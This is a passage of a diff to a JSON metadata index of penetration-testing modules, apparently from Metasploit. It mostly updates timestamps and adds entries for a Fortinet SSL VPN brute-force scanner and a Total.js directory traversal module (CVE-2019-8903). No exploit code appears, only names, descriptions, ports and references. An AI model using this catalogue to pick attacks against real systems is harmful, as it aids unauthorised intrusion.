      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_deployment_services_shares",
@@ -16232,7 +16223,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/zoomeye_search.rb",
    "is_install_path": true,
    "ref_name": "gather/zoomeye_search",
@@ -16370,7 +16361,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_login",
@@ -16403,7 +16394,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_server_info",
@@ -16472,7 +16463,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/chargen/chargen_probe",
@@ -16660,7 +16651,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/db2/discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/discovery",
@@ -16693,7 +16684,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/endpoint_mapper",
@@ -16726,7 +16717,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-12-31 14:41:33 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/hidden",
@@ -16759,7 +16750,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/management.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/management",
@@ -16792,7 +16783,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
@@ -16826,7 +16817,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/windows_deployment_services",
@@ -16991,7 +16982,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_multicast_ping",
@@ -17058,7 +17049,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-10-31 04:53:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_neighbor_router_advertisement",
@@ -18362,7 +18353,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/atlassian_crowd_fileaccess",
@@ -19302,7 +19293,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-12-11 10:16:16 +0000",
+    "mod_time": "2019-02-28 16:48:54 +0000",
    "path": "/modules/auxiliary/scanner/http/cisco_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_directory_traversal",
@@ -19346,7 +19337,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_download",
@@ -19826,7 +19817,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/concrete5_member_list",
@@ -20386,7 +20377,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dnalims_file_retrieve",
@@ -20601,7 +20592,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/elasticsearch_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/elasticsearch_traversal",
@@ -21156,6 +21147,48 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/http/fortinet_ssl_vpn": {
+    "name": "Fortinet SSL VPN Bruteforce Login Utility",
+    "full_name": "auxiliary/scanner/http/fortinet_ssl_vpn",
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Max Michels <kontakt@maxmichels.de>"
+    ],
+    "description": "This module scans for Fortinet SSL VPN web login portals and\n        performs login brute force to identify valid credentials.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-02-19 22:33:10 +0000",
+    "path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/fortinet_ssl_vpn",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/http/frontpage_credential_dump": {
    "name": "FrontPage .pwd File Credential Dump",
    "full_name": "auxiliary/scanner/http/frontpage_credential_dump",
@@ -21361,7 +21394,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
@@ -21536,7 +21569,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/goahead_traversal",
@@ -21901,7 +21934,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
@@ -21946,7 +21979,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
@@ -21991,7 +22024,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
@@ -22033,7 +22066,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-04 13:37:11 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sys_mgmt_login",
@@ -22296,7 +22329,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-02-13 06:20:57 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_traversal",
@@ -22502,7 +22535,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-11-23 17:15:33 +0000",
+    "mod_time": "2019-02-22 09:01:11 +0000",
    "path": "/modules/auxiliary/scanner/http/iis_shortname_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/iis_shortname_scanner",
@@ -22763,7 +22796,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-07-24 04:24:49 +0000",
+    "mod_time": "2019-02-13 16:10:32 +0000",
    "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_vulnscan",
@@ -22894,7 +22927,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
@@ -23498,7 +23531,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_traversal",
@@ -23543,7 +23576,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
@@ -23633,7 +23666,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mediawiki_svg_fileaccess",
@@ -23900,7 +23933,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mybook_live_login",
@@ -23945,7 +23978,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netdecision_traversal",
@@ -24123,7 +24156,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
@@ -24429,7 +24462,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
@@ -24474,7 +24507,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_file_retrieval",
@@ -25407,7 +25440,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_version_enum",
@@ -25621,7 +25654,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/simple_webserver_traversal",
@@ -25876,7 +25909,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sockso_traversal",
@@ -26171,7 +26204,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/surgenews_user_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/surgenews_user_creds",
@@ -26301,7 +26334,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sybase_easerver_traversal",
@@ -26345,7 +26378,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_ldapcreds",
@@ -26392,7 +26425,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_logfile",
@@ -26638,6 +26671,52 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/http/totaljs_traversal": {
+    "name": "Total.js prior to 3.2.4 Directory Traversal",
+    "full_name": "auxiliary/scanner/http/totaljs_traversal",
+    "rank": 300,
+    "disclosure_date": "2019-02-18",
+    "type": "auxiliary",
+    "author": [
+      "Riccardo Krauter",
+      "Fabio Cogno"
+    ],
+    "description": "This module check and exploits a directory traversal vulnerability in Total.js prior to 3.2.4.\n\n        Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml,\n        woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache,\n        manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic",
+    "references": [
+      "CVE-2019-8903",
+      "CWE-22",
+      "URL-https://blog.totaljs.com/blogs/news/20190213-a-critical-security-fix/",
+      "URL-https://snyk.io/vuln/SNYK-JS-TOTALJS-173710"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-03-11 22:23:11 +0000",
+    "path": "/modules/auxiliary/scanner/http/totaljs_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/totaljs_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "auxiliary_scanner/http/tplink_traversal_noauth": {
    "name": "TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability",
    "full_name": "auxiliary/scanner/http/tplink_traversal_noauth",
@@ -27183,7 +27262,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webpagetest_traversal",
@@ -28085,7 +28164,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/yaws_traversal",
@@ -28460,7 +28539,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-02-18 14:59:29 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/jenkins/jenkins_udp_broadcast_enum",
@@ -28898,7 +28977,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dahua_dvr_auth_bypass",
@@ -29452,7 +29531,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-11-22 08:03:12 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mongodb/mongodb_login",
@@ -29485,7 +29564,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/motorola/timbuktu_udp",
@@ -29835,7 +29914,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_ping",
@@ -30448,7 +30527,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nntp/nntp_login",
@@ -30521,7 +30600,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_nak_to_the_future",
@@ -31103,7 +31182,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_enum",
@@ -31178,7 +31257,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnslsnr_version",
@@ -31212,7 +31291,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnspoison_checker",
@@ -31565,7 +31644,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ftpbounce",
@@ -31852,7 +31931,7 @@
    "author": [
      "Deral \"Percentx\" Heiland",
      "Pete \"Bokojan\" Arzamendi",
-      "William Vu",
+      "wvu <wvu@metasploit.com>",
      "Dev Mohanty"
    ],
    "description": "This module will extract the passwords from address books on various Canon IR-Adv mfp devices.\n        Tested models:\n        iR-ADV C2030,\n        iR-ADV 4045,\n        iR-ADV C5030,\n        iR-ADV C5235,\n        iR-ADV C5240,\n        iR-ADV 6055,\n        iR-ADV C7065",
@@ -31878,7 +31957,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-22 17:01:49 +0000",
    "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/canon_iradv_pwd_extract",
@@ -31989,7 +32068,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 21:02:39 +0000",
    "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_env_vars",
@@ -32063,7 +32142,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 21:02:39 +0000",
    "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_volumes",
@@ -32414,7 +32493,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/rogue/rogue_recv.rb",
    "is_install_path": true,
    "ref_name": "scanner/rogue/rogue_recv",
@@ -32804,7 +32883,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_abaplog",
@@ -32890,7 +32969,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_extractusers",
@@ -32933,7 +33012,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
@@ -32976,7 +33055,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getenv",
@@ -33020,7 +33099,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
@@ -33064,7 +33143,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
@@ -33107,7 +33186,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
@@ -33150,7 +33229,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
@@ -33194,7 +33273,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-19 18:16:26 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
@@ -33237,7 +33316,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
@@ -33280,7 +33359,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_startprofile",
@@ -33323,7 +33402,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_version",
@@ -34304,7 +34383,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
@@ -34943,7 +35022,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_dcerpc_auditor",
@@ -34981,7 +35060,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/psexec_loggedin_users",
@@ -35125,7 +35204,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-09-11 19:05:26 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -35160,7 +35239,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
@@ -35196,7 +35275,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers_domain",
@@ -35234,7 +35313,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-11-05 17:49:58 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -35269,7 +35348,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-10-20 15:32:25 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
